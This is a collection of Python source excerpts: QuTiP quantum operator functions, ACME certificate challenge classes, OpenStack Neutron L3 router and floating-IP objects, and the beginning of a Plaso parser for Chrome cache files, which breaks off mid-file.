    [[ 0.          1.          0.          0.        ]
     [ 0.          0.          1.41421356  0.        ]
     [ 0.          0.          0.          1.73205081]
     [ 0.          0.          0.          0.        ]]
    """
    try:
        data = sp.diags(diagonals, offsets, shape, format='csr', dtype=complex)
    except Exception:
        # Narrowed from a bare ``except:`` so KeyboardInterrupt/SystemExit
        # are no longer swallowed; any construction failure is still
        # reported as the historical NotImplementedError.
        raise NotImplementedError("This function requires SciPy 0.11+.")

    if not dims:
        dims = [[], []]
    if not shape:
        shape = []
    return Qobj(data, dims, list(shape))
def phase(N, phi0=0):
    """
    Single-mode Pegg-Barnett phase operator.

    Parameters
    ----------
    N : int
        Number of basis states in Hilbert space.

    phi0 : float
        Reference phase.

    Returns
    -------
    oper : qobj
        Phase operator with respect to reference phase.

    Notes
    -----
    The Pegg-Barnett phase operator is Hermitian on a truncated Hilbert space.
    """
    # Discrete phase angles starting from the reference phase phi0.
    angles = phi0 + (2.0 * np.pi * np.arange(N)) / N
    levels = np.arange(N).reshape((N, 1))
    # One (unnormalized-by-phase) phase state per angle.
    phase_states = np.array(
        [np.sqrt(theta) / np.sqrt(N) * np.exp(1.0j * levels * theta)
         for theta in angles])
    projectors = np.array(
        [np.outer(state, state.conj()) for state in phase_states])
    return Qobj(np.sum(projectors, axis=0))
def qzero(N):
    """
    Zero operator

    Parameters
    ----------
    N : int or list of ints
        Dimension of Hilbert space. If provided as a list of ints,
        then the dimension is the product over this list, but the
        ``dims`` property of the new Qobj are set to this list.

    Returns
    -------
    qzero : qobj
        Zero operator Qobj.
    """
    if isinstance(N, list):
        return tensor(*[qzero(n) for n in N])
    N = int(N)
    # The original also tested isinstance(N, (int, np.integer)) *after*
    # int(N), which was always true (dead code); only the sign check is
    # meaningful here, matching qeye().
    if N < 0:
        raise ValueError("N must be integer N>=0")
    return Qobj(sp.csr_matrix((N, N), dtype=complex), isherm=True)
def enr_destroy(dims, excitations):
    """
    Generate annihilation operators for modes in a excitation-number-restricted
    state space. For example, consider a system consisting of 4 modes, each
    with 5 states. The total hilbert space size is 5**4 = 625. If we are
    only interested in states that contain up to 2 excitations, we only need
    to include states such as

        (0, 0, 0, 0)
        (0, 0, 0, 1)
        (0, 0, 0, 2)
        (0, 0, 1, 0)
        (0, 0, 1, 1)
        (0, 0, 2, 0)
        ...

    This function creates annihilation operators for the 4 modes that act
    within this state space:

        a1, a2, a3, a4 = enr_destroy([5, 5, 5, 5], excitations=2)

    From this point onwards, the annihilation operators a1, ..., a4 can be
    used to setup a Hamiltonian, collapse operators and expectation-value
    operators, etc., following the usual pattern.

    Parameters
    ----------
    dims : list
        A list of the dimensions of each subsystem of a composite quantum
        system.

    excitations : integer
        The maximum number of excitations that are to be included in the
        state space.

    Returns
    -------
    a_ops : list of qobj
        A list of annihilation operators for each mode in the composite
        quantum system described by dims.
    """
    from qutip.states import enr_state_dictionaries

    nstates, state2idx, idx2state = enr_state_dictionaries(dims, excitations)

    # BUG FIX: the ``np.complex`` alias was deprecated (NumPy 1.20) and
    # removed (NumPy 1.24); the builtin ``complex`` is the replacement.
    a_ops = [sp.lil_matrix((nstates, nstates), dtype=complex)
             for _ in range(len(dims))]

    # An entry <state1|a_idx|state2> = sqrt(n) exists exactly when state1
    # has one fewer excitation in mode idx and agrees elsewhere.
    for n1, state1 in idx2state.items():
        for n2, state2 in idx2state.items():
            for idx, a in enumerate(a_ops):
                s1 = [s for idx2, s in enumerate(state1) if idx != idx2]
                s2 = [s for idx2, s in enumerate(state2) if idx != idx2]
                if (state1[idx] == state2[idx] - 1) and (s1 == s2):
                    a_ops[idx][n1, n2] = np.sqrt(state2[idx])

    return [Qobj(a, dims=[dims, dims]) for a in a_ops]
def enr_identity(dims, excitations):
    """
    Generate the identity operator for the excitation-number restricted
    state space defined by the `dims` and `excitations` arguments. See the
    docstring for enr_fock for a more detailed description of these arguments.

    Parameters
    ----------
    dims : list
        A list of the dimensions of each subsystem of a composite quantum
        system.

    excitations : integer
        The maximum number of excitations that are to be included in the
        state space.

    Returns
    -------
    op : Qobj
        A Qobj instance that represent the identity operator in the
        excitation-number-restricted state space defined by `dims` and
        `excitations`.
    """
    from qutip.states import enr_state_dictionaries

    nstates, _, _ = enr_state_dictionaries(dims, excitations)
    # BUG FIX: ``np.complex`` was deprecated (NumPy 1.20) and removed
    # (NumPy 1.24); use the builtin ``complex`` instead.
    data = sp.eye(nstates, nstates, dtype=complex)
    return Qobj(data, dims=[dims, dims])
def charge(Nmax, Nmin=None, frac = 1):
    """
    Generate the diagonal charge operator over charge states
    from Nmin to Nmax.

    Parameters
    ----------
    Nmax : int
        Maximum charge state to consider.

    Nmin : int (default = -Nmax)
        Lowest charge state to consider.

    frac : float (default = 1)
        Specify fractional charge if needed.

    Returns
    -------
    C : Qobj
        Charge operator over [Nmin,Nmax].

    Notes
    -----
    .. versionadded:: 3.2
    """
    lower = -Nmax if Nmin is None else Nmin
    values = np.arange(lower, Nmax + 1, dtype=float)
    if frac != 1:
        values *= frac
    matrix = sp.diags(values, 0, format='csr', dtype=complex)
    return Qobj(matrix, isherm=True)
def tunneling(N, m=1):
    r"""
    Tunneling operator with elements of the form
    :math:`\sum |N><N+m| + |N+m><N|`.

    Parameters
    ----------
    N : int
        Number of basis states in Hilbert space.
    m : int (default = 1)
        Number of excitations in tunneling event.

    Returns
    -------
    T : Qobj
        Tunneling operator.

    Notes
    -----
    .. versionadded:: 3.2
    """
    # Two constant off-diagonals at +/-m couple states m excitations apart.
    # (Docstring made raw so the \s in :math: is not treated as an escape.)
    diags = [np.ones(N-m,dtype=int),np.ones(N-m,dtype=int)]
    T = sp.diags(diags,[m,-m],format='csr', dtype=complex)
    return Qobj(T, isherm=True)
# Break circular dependencies by a trailing import.
# Note that we use a relative import here to deal with that
# qutip.tensor is the *function* tensor, not the module.
from qutip.tensor import tensor
| |
"""ACME Identifier Validation Challenges."""
import binascii
import functools
import hashlib
import Crypto.Random
from acme import jose
from acme import other
# pylint: disable=too-few-public-methods
class Challenge(jose.TypedJSONObjectWithFields):
    # _fields_to_partial_json | pylint: disable=abstract-method
    """ACME challenge."""
    # typ -> class mapping; populated by ``Challenge.register`` on the
    # concrete subclasses defined below.
    TYPES = {}
# Marker base class: challenges that validate the client's continuity of
# account control (as opposed to domain validation).
class ContinuityChallenge(Challenge):  # pylint: disable=abstract-method
    """Client validation challenges."""
# Marker base class: challenges that validate control over a domain.
class DVChallenge(Challenge):  # pylint: disable=abstract-method
    """Domain validation challenges."""
class ChallengeResponse(jose.TypedJSONObjectWithFields):
    # _fields_to_partial_json | pylint: disable=abstract-method
    """ACME challenge response."""
    TYPES = {}

    @classmethod
    def from_json(cls, jobj):
        """Deserialize a response; JSON null means "not answered".

        If the client chooses not to respond to a given challenge, the
        corresponding entry in the response array is set to None (null),
        which this override maps straight to ``None``.
        """
        return None if jobj is None else super(
            ChallengeResponse, cls).from_json(jobj)
@Challenge.register
class SimpleHTTP(DVChallenge):
    """ACME "simpleHttp" challenge."""
    typ = "simpleHttp"

    # Random value the server expects to find in the provisioned resource.
    token = jose.Field("token")
@ChallengeResponse.register
class SimpleHTTPResponse(ChallengeResponse):
    """ACME "simpleHttp" challenge response."""
    typ = "simpleHttp"

    path = jose.Field("path")
    tls = jose.Field("tls", default=True, omitempty=True)

    URI_ROOT_PATH = ".well-known/acme-challenge"
    """URI root path for the server provisioned resource."""

    _URI_TEMPLATE = "{scheme}://{domain}/" + URI_ROOT_PATH + "/{path}"

    MAX_PATH_LEN = 25
    """Maximum allowed `path` length."""

    @property
    def good_path(self):
        """Is `path` good?

        .. todo:: acme-spec: "The value MUST be comprised entirely of
           characters from the URL-safe alphabet for Base64 encoding
           [RFC4648]", base64.b64decode ignores those characters

        """
        # BUG FIX: compare against the named constant MAX_PATH_LEN rather
        # than a duplicated literal 25, so the two cannot drift apart.
        return len(self.path) <= self.MAX_PATH_LEN

    @property
    def scheme(self):
        """URL scheme for the provisioned resource."""
        return "https" if self.tls else "http"

    def uri(self, domain):
        """Create an URI to the provisioned resource.

        Forms an URI to the HTTPS server provisioned resource
        (containing :attr:`~SimpleHTTP.token`).

        :param str domain: Domain name being verified.

        """
        return self._URI_TEMPLATE.format(
            scheme=self.scheme, domain=domain, path=self.path)
@Challenge.register
class DVSNI(DVChallenge):
    """ACME "dvsni" challenge.

    :ivar str r: Random data, **not** base64-encoded.
    :ivar str nonce: Random data, **not** hex-encoded.

    """
    typ = "dvsni"

    DOMAIN_SUFFIX = ".acme.invalid"
    """Domain name suffix."""

    R_SIZE = 32
    """Required size of the :attr:`r` in bytes."""

    NONCE_SIZE = 16
    """Required size of the :attr:`nonce` in bytes."""

    PORT = 443
    """Port to perform DVSNI challenge."""

    r = jose.Field("r", encoder=jose.b64encode,  # pylint: disable=invalid-name
                   decoder=functools.partial(jose.decode_b64jose, size=R_SIZE))
    # BUG FIX: the decoder was wrapped in functools.partial twice; the
    # outer partial added no arguments and was redundant.
    nonce = jose.Field("nonce", encoder=binascii.hexlify,
                       decoder=functools.partial(
                           jose.decode_hex16, size=NONCE_SIZE))

    @property
    def nonce_domain(self):
        """Domain name used in SNI."""
        # NOTE(review): binascii.hexlify returns bytes on Python 3; this
        # str concatenation assumes Python 2 semantics -- confirm before
        # running under Python 3.
        return binascii.hexlify(self.nonce) + self.DOMAIN_SUFFIX
@ChallengeResponse.register
class DVSNIResponse(ChallengeResponse):
    """ACME "dvsni" challenge response.

    :param str s: Random data, **not** base64-encoded.

    """
    typ = "dvsni"

    DOMAIN_SUFFIX = DVSNI.DOMAIN_SUFFIX
    """Domain name suffix."""

    S_SIZE = 32
    """Required size of the :attr:`s` in bytes."""

    s = jose.Field("s", encoder=jose.b64encode,  # pylint: disable=invalid-name
                   decoder=functools.partial(jose.decode_b64jose, size=S_SIZE))

    def __init__(self, s=None, *args, **kwargs):
        # Generate a fresh random ``s`` unless the caller supplied one.
        if s is None:
            s = Crypto.Random.get_random_bytes(self.S_SIZE)
        super(DVSNIResponse, self).__init__(s=s, *args, **kwargs)

    def z(self, chall):  # pylint: disable=invalid-name
        """Compute the parameter ``z``.

        :param challenge: Corresponding challenge.
        :type challenge: :class:`DVSNI`

        """
        digest = hashlib.new("sha256")
        digest.update(chall.r)
        digest.update(self.s)
        return digest.hexdigest()

    def z_domain(self, chall):
        """Domain name for certificate subjectAltName."""
        return self.z(chall) + self.DOMAIN_SUFFIX
@Challenge.register
class RecoveryContact(ContinuityChallenge):
    """ACME "recoveryContact" challenge."""
    typ = "recoveryContact"

    # All fields are optional in the protocol, hence omitempty.
    activation_url = jose.Field("activationURL", omitempty=True)
    success_url = jose.Field("successURL", omitempty=True)
    contact = jose.Field("contact", omitempty=True)
@ChallengeResponse.register
class RecoveryContactResponse(ChallengeResponse):
    """ACME "recoveryContact" challenge response."""
    typ = "recoveryContact"

    # Token received out-of-band via the recovery contact.
    token = jose.Field("token", omitempty=True)
@Challenge.register
class RecoveryToken(ContinuityChallenge):
    """ACME "recoveryToken" challenge (carries no fields beyond ``type``)."""
    typ = "recoveryToken"
@ChallengeResponse.register
class RecoveryTokenResponse(ChallengeResponse):
    """ACME "recoveryToken" challenge response."""
    typ = "recoveryToken"

    # Previously issued recovery token, if the client has one.
    token = jose.Field("token", omitempty=True)
@Challenge.register
class ProofOfPossession(ContinuityChallenge):
    """ACME "proofOfPossession" challenge.

    :ivar str nonce: Random data, **not** base64-encoded.
    :ivar hints: Various clues for the client (:class:`Hints`).

    """
    typ = "proofOfPossession"

    # Required size of :attr:`nonce` in bytes.
    NONCE_SIZE = 16

    class Hints(jose.JSONObjectWithFields):
        """Hints for "proofOfPossession" challenge.

        :ivar jwk: JSON Web Key (:class:`acme.jose.JWK`)
        :ivar list certs: List of :class:`acme.jose.ComparableX509`
            certificates.

        """
        jwk = jose.Field("jwk", decoder=jose.JWK.from_json)
        cert_fingerprints = jose.Field(
            "certFingerprints", omitempty=True, default=())
        certs = jose.Field("certs", omitempty=True, default=())
        subject_key_identifiers = jose.Field(
            "subjectKeyIdentifiers", omitempty=True, default=())
        serial_numbers = jose.Field("serialNumbers", omitempty=True, default=())
        issuers = jose.Field("issuers", omitempty=True, default=())
        authorized_for = jose.Field("authorizedFor", omitempty=True, default=())

        # Certificates cross the wire in encoded form; these hooks convert
        # each element of the tuple on (de)serialization.
        @certs.encoder
        def certs(value):  # pylint: disable=missing-docstring,no-self-argument
            return tuple(jose.encode_cert(cert) for cert in value)

        @certs.decoder
        def certs(value):  # pylint: disable=missing-docstring,no-self-argument
            return tuple(jose.decode_cert(cert) for cert in value)

    alg = jose.Field("alg", decoder=jose.JWASignature.from_json)
    nonce = jose.Field(
        "nonce", encoder=jose.b64encode, decoder=functools.partial(
            jose.decode_b64jose, size=NONCE_SIZE))
    hints = jose.Field("hints", decoder=Hints.from_json)
@ChallengeResponse.register
class ProofOfPossessionResponse(ChallengeResponse):
    """ACME "proofOfPossession" challenge response.

    :ivar str nonce: Random data, **not** base64-encoded.
    :ivar signature: :class:`~acme.other.Signature` of this message.

    """
    typ = "proofOfPossession"

    NONCE_SIZE = ProofOfPossession.NONCE_SIZE

    nonce = jose.Field(
        "nonce", encoder=jose.b64encode, decoder=functools.partial(
            jose.decode_b64jose, size=NONCE_SIZE))
    signature = jose.Field("signature", decoder=other.Signature.from_json)

    def verify(self):
        """Verify the challenge.

        :returns: whether the signature validates over the nonce.

        """
        # self.signature is not Field | pylint: disable=no-member
        return self.signature.verify(self.nonce)
@Challenge.register
class DNS(DVChallenge):
    """ACME "dns" challenge."""
    typ = "dns"

    # Random value to be provisioned in a DNS record.
    token = jose.Field("token")
@ChallengeResponse.register
class DNSResponse(ChallengeResponse):
    """ACME "dns" challenge response (carries no fields beyond ``type``)."""
    typ = "dns"
| |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import itertools
import netaddr
from neutron_lib.api.definitions import availability_zone as az_def
from neutron_lib.api.validators import availability_zone as az_validator
from oslo_versionedobjects import fields as obj_fields
import six
from sqlalchemy import func
from neutron.common import constants as n_const
from neutron.common import utils
from neutron.db.models import dvr as dvr_models
from neutron.db.models import l3
from neutron.db.models import l3_attrs
from neutron.db.models import l3agent as rb_model
from neutron.db import models_v2
from neutron.objects import base
from neutron.objects import common_types
@base.NeutronObjectRegistry.register
class RouterRoute(base.NeutronDbObject):
    """Versioned object for an extra static route attached to a router."""
    # Version 1.0: Initial version
    VERSION = '1.0'

    db_model = l3.RouterRoute

    fields = {
        'router_id': common_types.UUIDField(),
        'destination': common_types.IPNetworkField(),
        'nexthop': obj_fields.IPAddressField()
    }

    primary_keys = ['router_id', 'destination', 'nexthop']
    foreign_keys = {'Router': {'router_id': 'id'}}

    @classmethod
    def modify_fields_from_db(cls, db_obj):
        """Promote the DB's string columns to netaddr objects."""
        fields = super(RouterRoute, cls).modify_fields_from_db(db_obj)
        if 'destination' in fields:
            fields['destination'] = utils.AuthenticIPNetwork(
                fields['destination'])
        if 'nexthop' in fields:
            fields['nexthop'] = netaddr.IPAddress(fields['nexthop'])
        return fields

    @classmethod
    def modify_fields_to_db(cls, fields):
        """Flatten netaddr objects back into their string form."""
        db_fields = super(RouterRoute, cls).modify_fields_to_db(fields)
        for key in ('destination', 'nexthop'):
            if key in db_fields:
                db_fields[key] = cls.filter_to_str(db_fields[key])
        return db_fields
@base.NeutronObjectRegistry.register
class RouterExtraAttributes(base.NeutronDbObject):
    """Versioned object for per-router extra attributes (DVR/HA/AZ)."""
    # Version 1.0: Initial version
    VERSION = '1.0'

    db_model = l3_attrs.RouterExtraAttributes

    fields = {
        'router_id': common_types.UUIDField(),
        'distributed': obj_fields.BooleanField(default=False),
        'service_router': obj_fields.BooleanField(default=False),
        'ha': obj_fields.BooleanField(default=False),
        'ha_vr_id': obj_fields.IntegerField(nullable=True),
        'availability_zone_hints': obj_fields.ListOfStringsField(nullable=True)
    }

    primary_keys = ['router_id']

    foreign_keys = {'Router': {'router_id': 'id'}}

    @classmethod
    def modify_fields_from_db(cls, db_obj):
        """Expand the AZ hints DB string into a list of zone names."""
        result = super(RouterExtraAttributes, cls).modify_fields_from_db(
            db_obj)
        if az_def.AZ_HINTS in result:
            result[az_def.AZ_HINTS] = (
                az_validator.convert_az_string_to_list(
                    result[az_def.AZ_HINTS]))
        return result

    @classmethod
    def modify_fields_to_db(cls, fields):
        """Collapse the AZ hints list back into its DB string form."""
        result = super(RouterExtraAttributes, cls).modify_fields_to_db(fields)
        if az_def.AZ_HINTS in result:
            result[az_def.AZ_HINTS] = (
                az_validator.convert_az_list_to_string(
                    result[az_def.AZ_HINTS]))
        return result

    @classmethod
    def get_router_agents_count(cls, context):
        """Return (router, bound-L3-agent count) pairs for all routers.

        Routers with no agent binding appear with a NULL count via the
        outer join.
        """
        # TODO(sshank): This is pulled out from l3_agentschedulers_db.py
        # until a way to handle joins is figured out.
        binding_model = rb_model.RouterL3AgentBinding
        # Subquery: number of agent bindings per router_id.
        sub_query = (context.session.query(
            binding_model.router_id,
            func.count(binding_model.router_id).label('count')).
            join(l3_attrs.RouterExtraAttributes,
                 binding_model.router_id ==
                 l3_attrs.RouterExtraAttributes.router_id).
            join(l3.Router).
            group_by(binding_model.router_id).subquery())

        # Outer join keeps routers that have no bindings at all.
        query = (context.session.query(l3.Router, sub_query.c.count).
                 outerjoin(sub_query))

        return [(router, agent_count) for router, agent_count in query]
@base.NeutronObjectRegistry.register
class RouterPort(base.NeutronDbObject):
    """Versioned object for the router/port association table."""
    # Version 1.0: Initial version
    VERSION = '1.0'

    db_model = l3.RouterPort

    primary_keys = ['router_id', 'port_id']
    foreign_keys = {'Router': {'router_id': 'id'}}

    fields = {
        'router_id': common_types.UUIDField(),
        'port_id': common_types.UUIDField(),
        'port_type': obj_fields.StringField(nullable=True),
    }

    @classmethod
    def get_router_ids_by_subnetpool(cls, context, subnetpool_id):
        """Return distinct router ids with a router port on a subnet
        allocated from the given subnet pool."""
        query = (
            context.session.query(l3.RouterPort.router_id)
            .join(models_v2.Port)
            # Subnets are related to ports via the shared network id.
            .join(models_v2.Subnet,
                  models_v2.Subnet.network_id == models_v2.Port.network_id)
            .filter(models_v2.Subnet.subnetpool_id == subnetpool_id,
                    l3.RouterPort.port_type.in_(n_const.ROUTER_PORT_OWNERS))
            .distinct())
        return [row[0] for row in query]
@base.NeutronObjectRegistry.register
class DVRMacAddress(base.NeutronDbObject):
    """Versioned object for the per-host DVR MAC address table."""
    # Version 1.0: Initial version
    VERSION = '1.0'

    db_model = dvr_models.DistributedVirtualRouterMacAddress

    primary_keys = ['host']

    fields = {
        'host': obj_fields.StringField(),
        'mac_address': common_types.MACAddressField()
    }

    @classmethod
    def modify_fields_from_db(cls, db_obj):
        """Wrap the MAC column so its API textual format is retained."""
        converted = super(DVRMacAddress, cls).modify_fields_from_db(db_obj)
        try:
            raw_mac = converted['mac_address']
        except KeyError:
            pass
        else:
            # NOTE(tonytan4ever): AuthenticEUI retains the format passed
            # from the API.
            converted['mac_address'] = utils.AuthenticEUI(raw_mac)
        return converted

    @classmethod
    def modify_fields_to_db(cls, fields):
        """Convert the MAC value back to its DB string form."""
        converted = super(DVRMacAddress, cls).modify_fields_to_db(fields)
        # NOTE: the presence check deliberately inspects the *input*
        # fields mapping, matching the original behavior.
        if 'mac_address' in fields:
            converted['mac_address'] = cls.filter_to_str(
                converted['mac_address'])
        return converted
@base.NeutronObjectRegistry.register
class Router(base.NeutronDbObject):
    """Versioned object for the l3.Router model.

    Purely declarative: field definitions only, no custom DB conversion.
    """
    # Version 1.0: Initial version
    VERSION = '1.0'

    db_model = l3.Router

    fields = {
        'id': common_types.UUIDField(),
        'project_id': obj_fields.StringField(nullable=True),
        'name': obj_fields.StringField(nullable=True),
        'status': common_types.RouterStatusEnumField(nullable=True),
        'admin_state_up': obj_fields.BooleanField(nullable=True),
        'gw_port_id': common_types.UUIDField(nullable=True),
        'enable_snat': obj_fields.BooleanField(default=True),
        'flavor_id': common_types.UUIDField(nullable=True),
    }
@base.NeutronObjectRegistry.register
class FloatingIP(base.NeutronDbObject):
    """Versioned object for a floating IP and its optional fixed-port
    association."""
    # Version 1.0: Initial version
    VERSION = '1.0'

    db_model = l3.FloatingIP

    fields = {
        'id': common_types.UUIDField(),
        'project_id': obj_fields.StringField(nullable=True),
        'floating_ip_address': obj_fields.IPAddressField(),
        'floating_network_id': common_types.UUIDField(),
        'floating_port_id': common_types.UUIDField(),
        'fixed_port_id': common_types.UUIDField(nullable=True),
        'fixed_ip_address': obj_fields.IPAddressField(nullable=True),
        'router_id': common_types.UUIDField(nullable=True),
        'last_known_router_id': common_types.UUIDField(nullable=True),
        'status': common_types.FloatingIPStatusEnumField(nullable=True),
        'dns': obj_fields.ObjectField('FloatingIPDNS', nullable=True),
    }
    fields_no_update = ['project_id', 'floating_ip_address',
                        'floating_network_id', 'floating_port_id']
    synthetic_fields = ['dns']

    @classmethod
    def modify_fields_from_db(cls, db_obj):
        """Convert DB string columns into netaddr.IPAddress values.

        'fixed_ip_address' is declared nullable, so skip conversion when
        it is absent or None instead of passing None to
        netaddr.IPAddress (which raises). This mirrors the None guard in
        modify_fields_to_db.
        """
        result = super(FloatingIP, cls).modify_fields_from_db(db_obj)
        if result.get('fixed_ip_address') is not None:
            result['fixed_ip_address'] = netaddr.IPAddress(
                result['fixed_ip_address'])
        if 'floating_ip_address' in result:
            result['floating_ip_address'] = netaddr.IPAddress(
                result['floating_ip_address'])
        return result

    @classmethod
    def modify_fields_to_db(cls, fields):
        """Convert IP address values back into their DB string form."""
        result = super(FloatingIP, cls).modify_fields_to_db(fields)
        if 'fixed_ip_address' in result:
            if result['fixed_ip_address'] is not None:
                result['fixed_ip_address'] = cls.filter_to_str(
                    result['fixed_ip_address'])
        if 'floating_ip_address' in result:
            result['floating_ip_address'] = cls.filter_to_str(
                result['floating_ip_address'])
        return result

    @classmethod
    def get_scoped_floating_ips(cls, context, router_ids):
        """Yield (FloatingIP object, address_scope_id) for IPv4 floating
        IPs routed by any of the given routers."""
        query = context.session.query(l3.FloatingIP,
                                      models_v2.SubnetPool.address_scope_id)
        query = query.join(
            models_v2.Port,
            l3.FloatingIP.fixed_port_id == models_v2.Port.id)
        # Outer join of Subnet can cause each ip to have more than one row.
        query = query.outerjoin(
            models_v2.Subnet,
            models_v2.Subnet.network_id == models_v2.Port.network_id)
        query = query.filter(models_v2.Subnet.ip_version == 4)
        query = query.outerjoin(
            models_v2.SubnetPool,
            models_v2.Subnet.subnetpool_id == models_v2.SubnetPool.id)

        # Filter out on router_ids
        query = query.filter(l3.FloatingIP.router_id.in_(router_ids))
        return cls._unique_floatingip_iterator(context, query)

    @classmethod
    def _unique_floatingip_iterator(cls, context, query):
        """Iterates over only one row per floating ip. Ignores others."""
        # Group rows by fip id. They must be sorted by same.
        q = query.order_by(l3.FloatingIP.id)

        def _fip_id(row):
            # Each row is (FloatingIP db row, address_scope_id).
            return row[0]['id']

        group_iterator = itertools.groupby(q, _fip_id)

        # Just hit the first row of each group.
        for key, value in group_iterator:
            row = [r for r in six.next(value)]
            yield (cls._load_object(context, row[0]), row[1])
| |
# -*- coding: utf-8 -*-
"""Parser for Google Chrome and Chromium Cache files."""
from __future__ import unicode_literals
import os
from dfdatetime import webkit_time as dfdatetime_webkit_time
from dfvfs.resolver import resolver as path_spec_resolver
from dfvfs.path import factory as path_spec_factory
from plaso.containers import events
from plaso.containers import time_events
from plaso.lib import errors
from plaso.lib import definitions
from plaso.parsers import dtfabric_parser
from plaso.parsers import interface
from plaso.parsers import manager
class CacheAddress(object):
  """Chrome cache address.

  Attributes:
    block_number (int): block data file number.
    block_offset (int): offset within the block data file.
    block_size (int): block size.
    filename (str): name of the block data file.
    value (int): cache address.
  """
  FILE_TYPE_SEPARATE = 0
  FILE_TYPE_BLOCK_RANKINGS = 1
  FILE_TYPE_BLOCK_256 = 2
  FILE_TYPE_BLOCK_1024 = 3
  FILE_TYPE_BLOCK_4096 = 4

  _BLOCK_DATA_FILE_TYPES = [
      FILE_TYPE_BLOCK_RANKINGS,
      FILE_TYPE_BLOCK_256,
      FILE_TYPE_BLOCK_1024,
      FILE_TYPE_BLOCK_4096]

  # Block size in bytes per file type; index 0 (separate file) has none.
  _FILE_TYPE_BLOCK_SIZES = [0, 36, 256, 1024, 4096]

  def __init__(self, cache_address):
    """Initializes a cache address.

    Args:
      cache_address (int): cache address.
    """
    super(CacheAddress, self).__init__()
    self.block_number = None
    self.block_offset = None
    self.block_size = None
    self.filename = None
    self.value = cache_address

    # Bit 31 flags an initialized cache address; kept as the strings
    # 'True'/'False' to match the original representation.
    self.is_initialized = 'True' if cache_address & 0x80000000 else 'False'

    # Bits 28-30 encode the file type.
    self.file_type = (cache_address & 0x70000000) >> 28
    if cache_address == 0x00000000:
      return

    if self.file_type == self.FILE_TYPE_SEPARATE:
      # Separate data file named f_###### by the 28-bit selector.
      self.filename = 'f_{0:06x}'.format(cache_address & 0x0fffffff)

    elif self.file_type in self._BLOCK_DATA_FILE_TYPES:
      # Block data file data_# selected by bits 16-23.
      self.filename = 'data_{0:d}'.format((cache_address & 0x00ff0000) >> 16)

      file_block_size = self._FILE_TYPE_BLOCK_SIZES[self.file_type]
      # Bits 0-15 hold the block number, bits 24-25 the block count.
      self.block_number = cache_address & 0x0000ffff
      self.block_size = ((cache_address & 0x03000000) >> 24) * file_block_size
      # Block data files start with an 8192 byte header.
      self.block_offset = 8192 + (self.block_number * file_block_size)
class CacheEntry(object):
  """Chrome cache entry.

  Attributes:
    creation_time (int): creation time, in number of microseconds since
        January 1, 1601, 00:00:00 UTC.
    hash (int): super fast hash of the key.
    key (bytes): key.
    next (int): cache address of the next cache entry.
    original_url (str): original URL derived from the key.
    rankings_node (int): cache address of the rankings node.
  """

  def __init__(self):
    """Initializes a cache entry."""
    super(CacheEntry, self).__init__()
    # All attributes are populated by
    # ChromeCacheDataBlockFileParser.ParseCacheEntry.
    self.creation_time = None
    self.hash = None
    self.key = None
    self.next = None
    self.original_url = None
    self.rankings_node = None
class ChromeCacheIndexFileParser(dtfabric_parser.DtFabricBaseParser):
  """Chrome cache index file parser.

  Attributes:
    creation_time (int): creation time, in number of microseconds
        since January 1, 1601, 00:00:00 UTC.
    index_table (list[CacheAddress]): the cache addresses which are stored in
        the index file.
  """

  _DEFINITION_FILE = 'chrome_cache.yaml'

  def __init__(self):
    """Initializes an index file."""
    super(ChromeCacheIndexFileParser, self).__init__()
    self.creation_time = None
    self.index_table = []

  def _ParseFileHeader(self, file_object):
    """Parses the file header.

    Args:
      file_object (dfvfs.FileIO): a file-like object to parse.

    Raises:
      ParseError: if the file header cannot be read.
    """
    header_map = self._GetDataTypeMap('chrome_cache_index_file_header')

    try:
      header, _ = self._ReadStructureFromFileObject(
          file_object, 0, header_map)
    except (ValueError, errors.ParseError) as exception:
      raise errors.ParseError(
          'Unable to parse index file header with error: {0!s}'.format(
              exception))

    version_string = '{0:d}.{1:d}'.format(
        header.major_version, header.minor_version)
    supported_versions = ('2.0', '2.1')
    if version_string not in supported_versions:
      raise errors.ParseError(
          'Unsupported index file format version: {0:s}'.format(version_string))

    self.creation_time = header.creation_time

  def _ParseIndexTable(self, file_object):
    """Parses the index table.

    Args:
      file_object (dfvfs.FileIO): a file-like object to parse.

    Raises:
      ParseError: if the index table cannot be read.
    """
    cache_address_map = self._GetDataTypeMap('uint32le')
    file_offset = file_object.get_offset()

    while True:
      # Each table slot is a 32-bit little-endian cache address.
      cache_address_data = file_object.read(4)
      if len(cache_address_data) != 4:
        break

      try:
        value = self._ReadStructureFromByteStream(
            cache_address_data, file_offset, cache_address_map)
      except (ValueError, errors.ParseError) as exception:
        raise errors.ParseError((
            'Unable to map cache address at offset: 0x{0:08x} with error: '
            '{1!s}').format(file_offset, exception))

      # Zero-valued slots are empty and not recorded.
      if value:
        self.index_table.append(CacheAddress(value))

      file_offset += 4

  def ParseFileObject(self, parser_mediator, file_object):
    """Parses a file-like object.

    Args:
      parser_mediator (ParserMediator): a parser mediator.
      file_object (dfvfs.FileIO): a file-like object to parse.

    Raises:
      ParseError: when the file cannot be parsed.
    """
    try:
      self._ParseFileHeader(file_object)
    except errors.ParseError as exception:
      raise errors.ParseError(
          'Unable to parse index file header with error: {0!s}'.format(
              exception))

    # Skip over the LRU data, which is 112 bytes in size.
    file_object.seek(112, os.SEEK_CUR)

    self._ParseIndexTable(file_object)
class ChromeCacheDataBlockFileParser(dtfabric_parser.DtFabricBaseParser):
  """Chrome cache data block file parser."""

  _DEFINITION_FILE = 'chrome_cache.yaml'

  def _ParseFileHeader(self, file_object):
    """Parses the file header.

    Args:
      file_object (dfvfs.FileIO): a file-like object to parse.

    Raises:
      ParseError: if the file header cannot be read.
    """
    header_map = self._GetDataTypeMap('chrome_cache_data_block_file_header')

    try:
      header, _ = self._ReadStructureFromFileObject(
          file_object, 0, header_map)
    except (ValueError, errors.ParseError) as exception:
      raise errors.ParseError(
          'Unable to parse data block file header with error: {0!s}'.format(
              exception))

    version_string = '{0:d}.{1:d}'.format(
        header.major_version, header.minor_version)
    if version_string not in ('2.0', '2.1'):
      raise errors.ParseError(
          'Unsupported data block file format version: {0:s}'.format(
              version_string))

    # Only the known block sizes are supported.
    if header.block_size not in (256, 1024, 4096):
      raise errors.ParseError(
          'Unsupported data block file block size: {0:d}'.format(
              header.block_size))

  def ParseCacheEntry(self, file_object, block_offset):
    """Parses a cache entry.

